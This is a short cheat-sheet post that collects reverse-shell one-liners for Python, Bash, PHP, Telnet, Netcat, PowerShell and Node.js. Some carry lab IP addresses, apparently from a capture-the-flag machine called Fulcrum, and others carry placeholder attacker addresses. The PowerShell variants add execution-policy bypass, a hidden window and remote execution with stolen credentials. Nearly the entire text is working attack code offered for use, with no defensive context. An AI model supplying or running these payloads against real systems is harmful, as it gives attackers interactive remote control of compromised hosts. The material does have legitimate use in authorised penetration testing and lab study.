Reverse Shells
Post

Reverse Shells

Python

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.175",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash

1
/bin/bash -c 'bash -i >& /dev/tcp/<attacker_IP>/<attacker_PORT> 0>&1'

PHP

1
2
3
4
# Example 1
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1'");?>
# Example 2
php -r '$sock=fsockopen(“<attacker_IP>”,<attacker_PORT>); exec(“/bin/sh -I <&3 >&3 2>&3”);'

Example: Fulcrum

Telnet

1
telnet <attacker_IP> 4444 | /bin/bash | telnet <attacker_IP> 4445

Netcat

1
nc <attacker_IP> <attacker_PORT> -e /bin/sh

Netcat w/o “-e” option

1
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -I 2>&1 | nc <attacker_IP> <attacker_PORT> > /tmp/f

Powershell

From a non-powershell cli, we can execute our reverse shell with this command:

1
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.3",2345);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

If we are on a powershell cli, we can execute this one instead:

1
Invoke-Command -ComputerName file.fulcrum.local -Credential $Creds -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.16.3',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }

Examples: Fulcrum

Node JS

1
2
3
4
5
6
7
8
9
10
11
12
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(443, "10.10.14.2", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

Firefox Plugin

An excellent plugin to craft different payloads as Reverse Shells directly from firefox: hacktools